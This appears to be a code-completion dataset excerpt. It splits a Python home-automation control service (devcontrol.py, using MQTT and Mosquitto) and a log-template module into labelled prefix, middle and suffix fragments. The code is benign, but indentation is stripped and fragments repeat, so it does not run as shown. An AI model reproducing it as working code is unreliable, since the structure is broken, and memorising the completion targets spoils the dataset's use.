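# following the command dictionary documented above. shlex.split() does the
# tokenizing, so arguments containing spaces are double-quoted.
def _example_stdin_lines():
	return [
		'add guest42 "living room lamp" sonoff off',
		'cmd "living room lamp" "dimmer 126"',
		'timed add "living room lamp" 1893456000 exact "dimmer 126"',
		'recurrent add "living room lamp" 8 07 30 fuzzy "dimmer 126"',
		'info "living room lamp"',
	]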
def genconfig(infilename, definitions, outfilename):
"""Generate an appropriate Mosquitto configuration file."""
with open(infilename, "r") as infile:
text = infile.read()
template = string.Template(text)
text = template.safe_substitute(definitions)
with open(outfilename, "w") as outfile:
outfile.write(text)
def loop(mosquitto, configuration, db, cursor, guestlist, logger):
|
def main():
"""Program entry point."""
setsignals()
configuration = None
guestlist = set()
configfilename = sys.argv[1] if len(sys.argv) > 1 else "configuration.json"
guestlist.add("pipe")
scriptdir = os.path.dirname(os.path.realpath(__file__))
try:
with open(configfilename) as configfile:
configuration = json.loads(configfile.read())
except IOError:
print("Can't open configuration file", file=sys.stderr)
return
# the relative path is necessary for the mosquitto configuration file
# the join adds a trailing os-specific dir separator
configuration["relpath"] = os.path.join(os.path.relpath("./", scriptdir), "")
with sqlite3.connect(configuration["devdbfile"]) as db:
cursor = db.cursor()
try:
database.setupdb(cursor)
database.setsuperuser(cursor, configuration["superuser"], configuration["superpass"])
except KeyError:
print("Incomplete configuration file", file=sys.stderr)
return
except sqlite3.Error:
print("Can't set up the database and super user", file=sys.stderr)
return
db.commit()
genconfig(os.path.join(scriptdir, "mosquitto.conf.in"), configuration,
os.path.join(scriptdir, "mosquitto.conf"))
with subprocess.Popen(["mosquitto", "-c", os.path.join(scriptdir, "mosquitto.conf")],
stdout=subprocess.DEVNULL, stderr=subprocess.PIPE,
stdin=subprocess.DEVNULL, cwd=scriptdir) as mosquitto:
time.sleep(0.5) # let mosquitto broker start up
handler = None
try:
logger = logging.getLogger(__name__)
handler = logging.handlers.RotatingFileHandler(os.path.join(scriptdir, "mosquitto.log"),
"a", 1024 * 1024, 10)
handler.setFormatter(logging.Formatter())
logger.setLevel(logging.DEBUG)
logger.addHandler(handler)
print("MQTT broker started", file=sys.stderr)
loop(mosquitto, configuration, db, cursor, guestlist, logger)
finally:
mosquitto.terminate()
if handler is not None:
remaining = mosquitto.stderr.read()
logger.debug(remaining.strip().decode("utf8"))
handler.close()
if __name__ == "__main__":
main()
| """Main MQTT/REST API event loop."""
userdata = {"done": False, "database": db, "cursor": cursor,
"configuration": configuration, "client": None, "guestlist": guestlist}
client = None
try:
client = mqtt.Client(userdata=userdata)
client.username_pw_set(configuration["superuser"], configuration["superpass"])
client.on_connect = mqtthandlers.onconnect
client.on_disconnect = mqtthandlers.ondisconnect
client.on_message = mqtthandlers.onmessage
userdata["client"] = client
client.tls_set(configuration["certificate"])
client.connect(configuration["devhostname"], configuration["devmqttport"], keepalive=300)
mqttsocket = client.socket()
print("AutoHome public interface started", file=sys.stderr)
while not userdata["done"]:
try:
				# timeout is set to a value less than the keepalive period, otherwise
# loop_misc() may not be called on time and the server can close the connection
available = select.select([sys.stdin, mqttsocket, mosquitto.stderr], [], [], 30)
if mqttsocket in available[0]:
client.loop_read()
if sys.stdin in available[0]:
try:
processline(userdata, input())
db.commit()
except FormatError as e:
print("Error processing line: " + str(e), file=sys.stderr)
except EOFError:
userdata["done"] = True
if client.want_write():
client.loop_write()
client.loop_misc()
if mosquitto.stderr in available[0]:
line = mosquitto.stderr.readline()
logger.debug(line.strip().decode("utf8"))
except (KeyboardInterrupt, SystemExit):
raise
except Exception as e:
print("Unexpected exception", file=sys.stderr)
print(e, file=sys.stderr)
traceback.print_tb(e.__traceback__, file=sys.stderr)
time.sleep(10) # instead of crashing and losing everything, try to continue;
# if the problem was transient, the error is logged and the
# system is still available; if the problem is fatal,
# wait so as to not generate infinite logfiles with
				               # successive exceptions, e.g. because the SQL database has
# been corrupted and every attempt to access it fails
finally:
client.disconnect() | identifier_body |
devcontrol.py | # devcontrol.py
# Home automation device control service
#
# Part of AutoHome
#
# Copyright (c) 2017, Diego Guerrero
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * The names of its contributors may not be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDERS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Home automation device control service."""
import sqlite3
import os, sys, signal, subprocess
import json
import time
import select
import shlex
import logging, logging.handlers
import string
import traceback
import paho.mqtt.client as mqtt
from Event import Event
import database
import device
import mqtthandlers
# Exceptions
# ------------------------------------------------------------------------------
class FormatError(Exception):
"""Formatting error. An input string couldn't be parsed as it did not conform to its schema."""
pass
# Signals
# ------------------------------------------------------------------------------
def setsignals():
"""Set termination signals to gracefully close every resource."""
signal.signal(signal.SIGINT, gracefulexit)
signal.signal(signal.SIGTERM, gracefulexit)
signal.signal(signal.SIGHUP, gracefulexit)
def gracefulexit(signalnumber, frame):
"""Close the database, broker and client, and exit the program."""
sys.exit(0) # resources will be closed on their corresponding finally blocks
# Main routines
# ------------------------------------------------------------------------------
def processline(userdata, line):
"""Read a line from stdin and execute the corresponding command."""
def processcmd(command, args, expected_nargs, delegate):
"""Validate the number of arguments and call a delegate handler."""
if len(args) != expected_nargs:
raise FormatError("Wrong number of arguments for '" + command + "', expected " +
str(expected_nargs) + " but got " + str(len(args)))
delegate(userdata, *args)
# commands should use double quotes if an argument has spaces
# in it and escape internal double quotes as necessary
tokens = shlex.split(line)
if len(tokens) < 1:
return
cmd = tokens[0]
args = tokens[1:]
# Specialized handlers; they bridge the user facing interface and the internal implementations;
# see the command dictionary below for more information on each operation
def timed_handler(userdata, *args):
"""Accomodate the input for a non-recurrent event."""
fuzzy = False
if args[3] == "exact":
fuzzy = False
elif args[3] == "fuzzy":
fuzzy = True
else:
raise FormatError("Expected 'fuzzy' or 'exact' but found '" + args[3] + "' instead.")
event = Event.create_once(args[4], fuzzy, args[2])
if args[0] == "add":
device.schedule(userdata, args[1], event)
elif args[0] == "del":
device.unschedule(userdata, args[1], event)
else:
raise FormatError("Expected 'add' or 'del' but found '" + args[0] + "' instead.")
def recurrent_handler(userdata, *args):
"""Accomodate the input for a recurrent event."""
fuzzy = False
if args[5] == "exact":
fuzzy = False
elif args[5] == "fuzzy":
fuzzy = True
else:
raise FormatError("Expected 'fuzzy' or 'exact' but found '" + args[5] + "' instead.")
event = Event.create_recurrent(args[6], fuzzy, args[2], args[3], args[4])
if args[0] == "add":
device.schedule(userdata, args[1], event)
elif args[0] == "del":
device.unschedule(userdata, args[1], event)
else:
raise FormatError("Expected 'add' or 'del' but found '" + args[0] + "' instead.")
def devlist_handler(userdata, *args):
"""Transform the raw devlist into a human readable list."""
for (dev, connected) in database.devlist(userdata["cursor"]):
if dev == "devmaster":
continue
if connected:
print(shlex.quote("+" + dev), end=" ")
else:
print(shlex.quote("-" + dev), end=" ")
print()
def guestlist_handler(userdata, *args):
"""Transform the raw guestlist into a human readable list."""
for guest in userdata["guestlist"]:
print(shlex.quote(guest), end=" ")
print()
def info_handler(userdata, *args):
"""Transform the raw info list into a human readable list."""
info = database.devinfo(userdata["cursor"], args[0])
if info is None:
print("can't find user " + args[0])
return
stype, connected, status = info
print(shlex.quote(("+" if connected else "-") + stype), end=" ")
print(shlex.quote(status))
def schedule_handler(userdata, *args):
"""Transform the raw schedule list into a human readable list."""
for event in database.devschedule(userdata["cursor"], args[0]):
print(str(event))
print("")
# Command dictionary
commands = {
# "command name": (expected_nargs, delegate)
"add": (4, device.add),
# add <guestname> <displayname> <type> <status>
# add a device to the network
"rename": (2, device.rename),
# rename <displayname> <newdisplayname>
# change the public display name of a device in the network
"del": (1, device.delete),
# del <displayname>
# delete a device from the network
"sync": (1, device.sync),
# sync <displayname>
# send a time synchronization message to the specified device
"ping": (1, device.ping),
# ping <displayname>
# check a device is still responsive by sending a ping message
"askstatus": (1, device.askstatus),
# askstatus <displayname>
# ask the device for its current status
"cmd": (2, device.execute),
# cmd <displayname> <operation>
# send immediate command to device;
# arguments to the operation should be within the operation argument, e.g. 'dimmer 126'
# the operation must be valid (and have valid arguments) for the device type;
# otherwise, the command will fail silently
"timed": (5, timed_handler),
# timed (add|del) <displayname> <date> (exact|fuzzy) <operation>
# schedule a command for the future;
# 'add' indicates to add the operation to the schedule, 'del' indicates to remove it from it;
# <date> must be formatted as a unix integer timestamp in the future,
# otherwise the command is a no-op;
# 'exact' sets the timer for the specific timestamp; 'fuzzy' adds a small amount of time noise;
# <operation> and <args> follow the same rules as the 'cmd' message;
"recurrent": (7, recurrent_handler),
# recurrent (add|del) <displayname> <weekday> <hours> <minutes> (exact|fuzzy) <operation>
# schedule a recurrent command for the future;
# 'add' indicates to add the operation to the schedule, 'del' indicates to remove it from it;
# <weekday> must be a number between 0 and 9. Passing 0 signals the operation should execute
# every day; 1-7 signal it should be executed on Mon-Sun respectively; 8 signals Mon-Fri; and
# 9 signals Sat-Sun;
# 'exact' sets the timer for the specific timestamp; 'fuzzy' adds a small amount of time noise;
# <operation> and <args> follow the same rules as the 'cmd' message
"clear": (1, device.clearschedule),
# clear <displayname>
# clear the schedule for a given device
"devlist": (0, devlist_handler),
# devlist
# retrieve verified device list
# respond with a list of devices, using the format: ('(-|+)<displayname>' )*
# where every name is prepended with a positive sign '+' if the device is connected
# and a negative sign '-' if it is not
"guestlist": (0, guestlist_handler),
# guestlist
# retrieve the guestlist
# respond with a list of unverified devices, using the format ('<displayname>' )*
# note that every guest is connected (otherwise it would just be removed from the list)
"info": (1, info_handler),
# info <displayname>
# retrieve device profile
# respond with the list of device properties in the profile using the format
# <connected><type> <status>
# where connected is formatted as + if the device is connected as - if it is not, e.g.
# '-sonoff on' indicates a disconnected sonoff device with a status of 'on'
"schedule": (1, schedule_handler)
# schedule <displayname>
# retrieve device schedule
# respond with a list of scheduled commands for the given device using the formats
# timed <date> (exact|fuzzy) <operation> <args>
# recurrent <weekday> <hours> <minutes> (exact|fuzzy) <operation> [<args>]
# for timed and recurrent operations respectively;
# the specifics of each formats are the same as for their schedule counterparts
}
try:
(expected_nargs, delegate) = commands[cmd]
except KeyError:
print("Unrecognized command, skipping", file=sys.stderr)
return
processcmd(cmd, args, expected_nargs, delegate)
def genconfig(infilename, definitions, outfilename):
"""Generate an appropriate Mosquitto configuration file."""
with open(infilename, "r") as infile:
text = infile.read()
template = string.Template(text)
text = template.safe_substitute(definitions)
with open(outfilename, "w") as outfile:
outfile.write(text)
def loop(mosquitto, configuration, db, cursor, guestlist, logger):
"""Main MQTT/REST API event loop."""
userdata = {"done": False, "database": db, "cursor": cursor,
"configuration": configuration, "client": None, "guestlist": guestlist}
client = None
try:
client = mqtt.Client(userdata=userdata)
client.username_pw_set(configuration["superuser"], configuration["superpass"])
client.on_connect = mqtthandlers.onconnect
client.on_disconnect = mqtthandlers.ondisconnect
client.on_message = mqtthandlers.onmessage
userdata["client"] = client
client.tls_set(configuration["certificate"])
client.connect(configuration["devhostname"], configuration["devmqttport"], keepalive=300)
mqttsocket = client.socket()
print("AutoHome public interface started", file=sys.stderr)
while not userdata["done"]:
try:
				# timeout is set to a value less than the keepalive period, otherwise
# loop_misc() may not be called on time and the server can close the connection
available = select.select([sys.stdin, mqttsocket, mosquitto.stderr], [], [], 30)
if mqttsocket in available[0]:
client.loop_read()
if sys.stdin in available[0]:
try:
processline(userdata, input())
db.commit()
except FormatError as e:
print("Error processing line: " + str(e), file=sys.stderr)
except EOFError:
userdata["done"] = True
if client.want_write():
client.loop_write()
client.loop_misc()
if mosquitto.stderr in available[0]:
line = mosquitto.stderr.readline()
logger.debug(line.strip().decode("utf8"))
except (KeyboardInterrupt, SystemExit):
raise
except Exception as e:
print("Unexpected exception", file=sys.stderr)
print(e, file=sys.stderr)
traceback.print_tb(e.__traceback__, file=sys.stderr)
time.sleep(10) # instead of crashing and losing everything, try to continue;
# if the problem was transient, the error is logged and the
# system is still available; if the problem is fatal,
# wait so as to not generate infinite logfiles with
				               # successive exceptions, e.g. because the SQL database has
# been corrupted and every attempt to access it fails
finally:
client.disconnect()
def main():
"""Program entry point."""
setsignals()
configuration = None
guestlist = set()
configfilename = sys.argv[1] if len(sys.argv) > 1 else "configuration.json"
guestlist.add("pipe")
scriptdir = os.path.dirname(os.path.realpath(__file__))
try:
with open(configfilename) as configfile:
configuration = json.loads(configfile.read())
except IOError:
print("Can't open configuration file", file=sys.stderr)
return
# the relative path is necessary for the mosquitto configuration file
# the join adds a trailing os-specific dir separator
configuration["relpath"] = os.path.join(os.path.relpath("./", scriptdir), "")
with sqlite3.connect(configuration["devdbfile"]) as db:
cursor = db.cursor()
try:
database.setupdb(cursor)
database.setsuperuser(cursor, configuration["superuser"], configuration["superpass"])
except KeyError:
print("Incomplete configuration file", file=sys.stderr)
return
except sqlite3.Error:
print("Can't set up the database and super user", file=sys.stderr)
return
db.commit()
genconfig(os.path.join(scriptdir, "mosquitto.conf.in"), configuration,
os.path.join(scriptdir, "mosquitto.conf"))
with subprocess.Popen(["mosquitto", "-c", os.path.join(scriptdir, "mosquitto.conf")],
stdout=subprocess.DEVNULL, stderr=subprocess.PIPE,
stdin=subprocess.DEVNULL, cwd=scriptdir) as mosquitto:
time.sleep(0.5) # let mosquitto broker start up
handler = None
try:
logger = logging.getLogger(__name__)
handler = logging.handlers.RotatingFileHandler(os.path.join(scriptdir, "mosquitto.log"),
"a", 1024 * 1024, 10)
handler.setFormatter(logging.Formatter())
logger.setLevel(logging.DEBUG)
logger.addHandler(handler)
print("MQTT broker started", file=sys.stderr)
loop(mosquitto, configuration, db, cursor, guestlist, logger)
finally:
mosquitto.terminate()
if handler is not None:
remaining = mosquitto.stderr.read()
logger.debug(remaining.strip().decode("utf8"))
handler.close()
if __name__ == "__main__":
| main() | conditional_block |
|
devcontrol.py | # devcontrol.py
# Home automation device control service
#
# Part of AutoHome
#
# Copyright (c) 2017, Diego Guerrero
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * The names of its contributors may not be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDERS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Home automation device control service."""
import sqlite3
import os, sys, signal, subprocess
import json
import time
import select
import shlex
import logging, logging.handlers
import string
import traceback
import paho.mqtt.client as mqtt
from Event import Event
import database
import device
import mqtthandlers
# Exceptions
# ------------------------------------------------------------------------------
class FormatError(Exception):
"""Formatting error. An input string couldn't be parsed as it did not conform to its schema."""
pass
# Signals
# ------------------------------------------------------------------------------
def setsignals():
"""Set termination signals to gracefully close every resource."""
signal.signal(signal.SIGINT, gracefulexit)
signal.signal(signal.SIGTERM, gracefulexit)
signal.signal(signal.SIGHUP, gracefulexit)
def gracefulexit(signalnumber, frame):
"""Close the database, broker and client, and exit the program."""
sys.exit(0) # resources will be closed on their corresponding finally blocks
# Main routines
# ------------------------------------------------------------------------------
def | (userdata, line):
"""Read a line from stdin and execute the corresponding command."""
def processcmd(command, args, expected_nargs, delegate):
"""Validate the number of arguments and call a delegate handler."""
if len(args) != expected_nargs:
raise FormatError("Wrong number of arguments for '" + command + "', expected " +
str(expected_nargs) + " but got " + str(len(args)))
delegate(userdata, *args)
# commands should use double quotes if an argument has spaces
# in it and escape internal double quotes as necessary
tokens = shlex.split(line)
if len(tokens) < 1:
return
cmd = tokens[0]
args = tokens[1:]
# Specialized handlers; they bridge the user facing interface and the internal implementations;
# see the command dictionary below for more information on each operation
def timed_handler(userdata, *args):
"""Accomodate the input for a non-recurrent event."""
fuzzy = False
if args[3] == "exact":
fuzzy = False
elif args[3] == "fuzzy":
fuzzy = True
else:
raise FormatError("Expected 'fuzzy' or 'exact' but found '" + args[3] + "' instead.")
event = Event.create_once(args[4], fuzzy, args[2])
if args[0] == "add":
device.schedule(userdata, args[1], event)
elif args[0] == "del":
device.unschedule(userdata, args[1], event)
else:
raise FormatError("Expected 'add' or 'del' but found '" + args[0] + "' instead.")
def recurrent_handler(userdata, *args):
"""Accomodate the input for a recurrent event."""
fuzzy = False
if args[5] == "exact":
fuzzy = False
elif args[5] == "fuzzy":
fuzzy = True
else:
raise FormatError("Expected 'fuzzy' or 'exact' but found '" + args[5] + "' instead.")
event = Event.create_recurrent(args[6], fuzzy, args[2], args[3], args[4])
if args[0] == "add":
device.schedule(userdata, args[1], event)
elif args[0] == "del":
device.unschedule(userdata, args[1], event)
else:
raise FormatError("Expected 'add' or 'del' but found '" + args[0] + "' instead.")
def devlist_handler(userdata, *args):
"""Transform the raw devlist into a human readable list."""
for (dev, connected) in database.devlist(userdata["cursor"]):
if dev == "devmaster":
continue
if connected:
print(shlex.quote("+" + dev), end=" ")
else:
print(shlex.quote("-" + dev), end=" ")
print()
def guestlist_handler(userdata, *args):
"""Transform the raw guestlist into a human readable list."""
for guest in userdata["guestlist"]:
print(shlex.quote(guest), end=" ")
print()
def info_handler(userdata, *args):
"""Transform the raw info list into a human readable list."""
info = database.devinfo(userdata["cursor"], args[0])
if info is None:
print("can't find user " + args[0])
return
stype, connected, status = info
print(shlex.quote(("+" if connected else "-") + stype), end=" ")
print(shlex.quote(status))
def schedule_handler(userdata, *args):
"""Transform the raw schedule list into a human readable list."""
for event in database.devschedule(userdata["cursor"], args[0]):
print(str(event))
print("")
# Command dictionary
commands = {
# "command name": (expected_nargs, delegate)
"add": (4, device.add),
# add <guestname> <displayname> <type> <status>
# add a device to the network
"rename": (2, device.rename),
# rename <displayname> <newdisplayname>
# change the public display name of a device in the network
"del": (1, device.delete),
# del <displayname>
# delete a device from the network
"sync": (1, device.sync),
# sync <displayname>
# send a time synchronization message to the specified device
"ping": (1, device.ping),
# ping <displayname>
# check a device is still responsive by sending a ping message
"askstatus": (1, device.askstatus),
# askstatus <displayname>
# ask the device for its current status
"cmd": (2, device.execute),
# cmd <displayname> <operation>
# send immediate command to device;
# arguments to the operation should be within the operation argument, e.g. 'dimmer 126'
# the operation must be valid (and have valid arguments) for the device type;
# otherwise, the command will fail silently
"timed": (5, timed_handler),
# timed (add|del) <displayname> <date> (exact|fuzzy) <operation>
# schedule a command for the future;
# 'add' indicates to add the operation to the schedule, 'del' indicates to remove it from it;
# <date> must be formatted as a unix integer timestamp in the future,
# otherwise the command is a no-op;
# 'exact' sets the timer for the specific timestamp; 'fuzzy' adds a small amount of time noise;
# <operation> and <args> follow the same rules as the 'cmd' message;
"recurrent": (7, recurrent_handler),
# recurrent (add|del) <displayname> <weekday> <hours> <minutes> (exact|fuzzy) <operation>
# schedule a recurrent command for the future;
# 'add' indicates to add the operation to the schedule, 'del' indicates to remove it from it;
# <weekday> must be a number between 0 and 9. Passing 0 signals the operation should execute
# every day; 1-7 signal it should be executed on Mon-Sun respectively; 8 signals Mon-Fri; and
# 9 signals Sat-Sun;
# 'exact' sets the timer for the specific timestamp; 'fuzzy' adds a small amount of time noise;
# <operation> and <args> follow the same rules as the 'cmd' message
"clear": (1, device.clearschedule),
# clear <displayname>
# clear the schedule for a given device
"devlist": (0, devlist_handler),
# devlist
# retrieve verified device list
# respond with a list of devices, using the format: ('(-|+)<displayname>' )*
# where every name is prepended with a positive sign '+' if the device is connected
# and a negative sign '-' if it is not
"guestlist": (0, guestlist_handler),
# guestlist
# retrieve the guestlist
# respond with a list of unverified devices, using the format ('<displayname>' )*
# note that every guest is connected (otherwise it would just be removed from the list)
"info": (1, info_handler),
# info <displayname>
# retrieve device profile
# respond with the list of device properties in the profile using the format
# <connected><type> <status>
# where connected is formatted as + if the device is connected as - if it is not, e.g.
# '-sonoff on' indicates a disconnected sonoff device with a status of 'on'
"schedule": (1, schedule_handler)
# schedule <displayname>
# retrieve device schedule
# respond with a list of scheduled commands for the given device using the formats
# timed <date> (exact|fuzzy) <operation> <args>
# recurrent <weekday> <hours> <minutes> (exact|fuzzy) <operation> [<args>]
# for timed and recurrent operations respectively;
# the specifics of each formats are the same as for their schedule counterparts
}
try:
(expected_nargs, delegate) = commands[cmd]
except KeyError:
print("Unrecognized command, skipping", file=sys.stderr)
return
processcmd(cmd, args, expected_nargs, delegate)
def genconfig(infilename, definitions, outfilename):
"""Generate an appropriate Mosquitto configuration file."""
with open(infilename, "r") as infile:
text = infile.read()
template = string.Template(text)
text = template.safe_substitute(definitions)
with open(outfilename, "w") as outfile:
outfile.write(text)
def loop(mosquitto, configuration, db, cursor, guestlist, logger):
"""Main MQTT/REST API event loop."""
userdata = {"done": False, "database": db, "cursor": cursor,
"configuration": configuration, "client": None, "guestlist": guestlist}
client = None
try:
client = mqtt.Client(userdata=userdata)
client.username_pw_set(configuration["superuser"], configuration["superpass"])
client.on_connect = mqtthandlers.onconnect
client.on_disconnect = mqtthandlers.ondisconnect
client.on_message = mqtthandlers.onmessage
userdata["client"] = client
client.tls_set(configuration["certificate"])
client.connect(configuration["devhostname"], configuration["devmqttport"], keepalive=300)
mqttsocket = client.socket()
print("AutoHome public interface started", file=sys.stderr)
while not userdata["done"]:
try:
				# timeout is set to a value less than the keepalive period, otherwise
# loop_misc() may not be called on time and the server can close the connection
available = select.select([sys.stdin, mqttsocket, mosquitto.stderr], [], [], 30)
if mqttsocket in available[0]:
client.loop_read()
if sys.stdin in available[0]:
try:
processline(userdata, input())
db.commit()
except FormatError as e:
print("Error processing line: " + str(e), file=sys.stderr)
except EOFError:
userdata["done"] = True
if client.want_write():
client.loop_write()
client.loop_misc()
if mosquitto.stderr in available[0]:
line = mosquitto.stderr.readline()
logger.debug(line.strip().decode("utf8"))
except (KeyboardInterrupt, SystemExit):
raise
except Exception as e:
print("Unexpected exception", file=sys.stderr)
print(e, file=sys.stderr)
traceback.print_tb(e.__traceback__, file=sys.stderr)
time.sleep(10) # instead of crashing and losing everything, try to continue;
# if the problem was transient, the error is logged and the
# system is still available; if the problem is fatal,
# wait so as to not generate infinite logfiles with
				               # successive exceptions, e.g. because the SQL database has
# been corrupted and every attempt to access it fails
finally:
client.disconnect()
def main():
"""Program entry point."""
setsignals()
configuration = None
guestlist = set()
configfilename = sys.argv[1] if len(sys.argv) > 1 else "configuration.json"
guestlist.add("pipe")
scriptdir = os.path.dirname(os.path.realpath(__file__))
try:
with open(configfilename) as configfile:
configuration = json.loads(configfile.read())
except IOError:
print("Can't open configuration file", file=sys.stderr)
return
# the relative path is necessary for the mosquitto configuration file
# the join adds a trailing os-specific dir separator
configuration["relpath"] = os.path.join(os.path.relpath("./", scriptdir), "")
with sqlite3.connect(configuration["devdbfile"]) as db:
cursor = db.cursor()
try:
database.setupdb(cursor)
database.setsuperuser(cursor, configuration["superuser"], configuration["superpass"])
except KeyError:
print("Incomplete configuration file", file=sys.stderr)
return
except sqlite3.Error:
print("Can't set up the database and super user", file=sys.stderr)
return
db.commit()
genconfig(os.path.join(scriptdir, "mosquitto.conf.in"), configuration,
os.path.join(scriptdir, "mosquitto.conf"))
with subprocess.Popen(["mosquitto", "-c", os.path.join(scriptdir, "mosquitto.conf")],
stdout=subprocess.DEVNULL, stderr=subprocess.PIPE,
stdin=subprocess.DEVNULL, cwd=scriptdir) as mosquitto:
time.sleep(0.5) # let mosquitto broker start up
handler = None
try:
logger = logging.getLogger(__name__)
handler = logging.handlers.RotatingFileHandler(os.path.join(scriptdir, "mosquitto.log"),
"a", 1024 * 1024, 10)
handler.setFormatter(logging.Formatter())
logger.setLevel(logging.DEBUG)
logger.addHandler(handler)
print("MQTT broker started", file=sys.stderr)
loop(mosquitto, configuration, db, cursor, guestlist, logger)
finally:
mosquitto.terminate()
if handler is not None:
remaining = mosquitto.stderr.read()
logger.debug(remaining.strip().decode("utf8"))
handler.close()
if __name__ == "__main__":
main()
| processline | identifier_name |
lt_common.py | #!/usr/bin/env python
# coding: utf-8
import os
import logging
import cPickle as pickle
_logger = logging.getLogger(__name__)
class LTManager(object):
    # adding lt to db (ltgen itself does not add)
def __init__(self, conf, db, table, reset_db, ltg_alg):
self.reset_db = reset_db
self.conf = conf
self.sym = conf.get("log_template", "variable_symbol")
self.filename = conf.get("log_template", "indata_filename")
self.db = db # log_db.LogDB
self.table = table # LTTable
self.ltgroup = self._init_ltgroup(ltg_alg) # LTGroup
if os.path.exists(self.filename) and not reset_db:
self.load()
def _init_ltgroup(self, ltg_alg):
if ltg_alg == "shiso":
import lt_shiso
ltgroup = lt_shiso.LTGroupSHISO(self.table,
ngram_length = self.conf.getint(
"log_template_shiso", "ltgroup_ngram_length"),
th_lookup = self.conf.getfloat(
"log_template_shiso", "ltgroup_th_lookup"),
th_distance = self.conf.getfloat(
"log_template_shiso", "ltgroup_th_distance"),
mem_ngram = self.conf.getboolean(
"log_template_shiso", "ltgroup_mem_ngram")
)
elif ltg_alg == "none":
ltgroup = LTGroup()
else:
raise ValueError("ltgroup_alg({0}) invalid".format(ltg_alg))
if not self.reset_db:
ltgroup.restore_ltg(self.db, self.table)
return ltgroup
def process_line(self, l_w, l_s):
# return ltline object
# if ltline is None, it means lt not found in pre-defined table
raise NotImplementedError
def add_lt(self, l_w, l_s, cnt = 1):
# add new lt to db and table
ltid = self.table.next_ltid()
ltline = LogTemplate(ltid, None, l_w, l_s, cnt, self.sym)
ltgid = self.ltgroup.add(ltline)
ltline.ltgid = ltgid
self.table.add_lt(ltline)
self.db.add_lt(ltline)
return ltline
def replace_lt(self, ltid, l_w, l_s = None, cnt = None):
self.table[ltid].replace(l_w, l_s, cnt)
self.db.update_lt(ltid, l_w, l_s, cnt)
def replace_and_count_lt(self, ltid, l_w, l_s = None):
cnt = self.table[ltid].count()
self.table[ltid].replace(l_w, l_s, None)
self.db.update_lt(ltid, l_w, l_s, cnt)
def count_lt(self, ltid):
cnt = self.table[ltid].count()
self.db.update_lt(ltid, None, None, cnt)
def remove_lt(self, ltid):
self.table.remove_lt(ltid)
self.db.remove_lt(ltid)
def remake_ltg(self):
self.db.reset_ltg()
self.ltgroup.init_dict()
temp_table = self.table
self.ltgroup.table = LTTable(self.sym)
for ltline in temp_table:
ltgid = self.ltgroup.add(ltline)
ltline.ltgid = ltgid
self.ltgroup.table.add_lt(ltline)
self.db.add_ltg(ltline.ltid, ltgid)
assert self.ltgroup.table.ltdict == temp_table.ltdict
def load(self):
pass
def dump(self):
pass
def _load_pickle(self):
with open(self.filename, 'r') as f:
return pickle.load(f)
def _dump_pickle(self, obj):
with open(self.filename, 'w') as f:
pickle.dump(obj, f)
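# Illustrative subclass (an assumption, not part of this module): sketches how
# a concrete LTManager is expected to implement process_line() on top of the
# add_lt()/count_lt() helpers above. Real generators (e.g. the SHISO-based one
# in lt_shiso) use fuzzier matching than this exact word-by-word lookup.
class LTManagerExactExample(LTManager):
    def process_line(self, l_w, l_s):
        for ltline in self.table:
            if ltline.ltw == l_w:
                self.count_lt(ltline.ltid)
                return ltline
        return self.add_lt(l_w, l_s)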
class LTTable():
def __init__(self, sym):
self.ltdict = {}
self.sym = sym
def __iter__(self):
return self._generator()
def _generator(self):
for ltid in self.ltdict.keys():
yield self.ltdict[ltid]
def __len__(self):
return len(self.ltdict)
def __getitem__(self, key):
assert isinstance(key, int)
if not self.ltdict.has_key(key):
raise IndexError("list index out of range")
return self.ltdict[key]
def next_ltid(self):
cnt = 0
while self.ltdict.has_key(cnt):
cnt += 1
else:
return cnt
def restore_lt(self, ltid, ltgid, ltw, lts, count):
assert not self.ltdict.has_key(ltid)
self.ltdict[ltid] = LogTemplate(ltid, ltgid, ltw, lts, count, self.sym)
def add_lt(self, ltline):
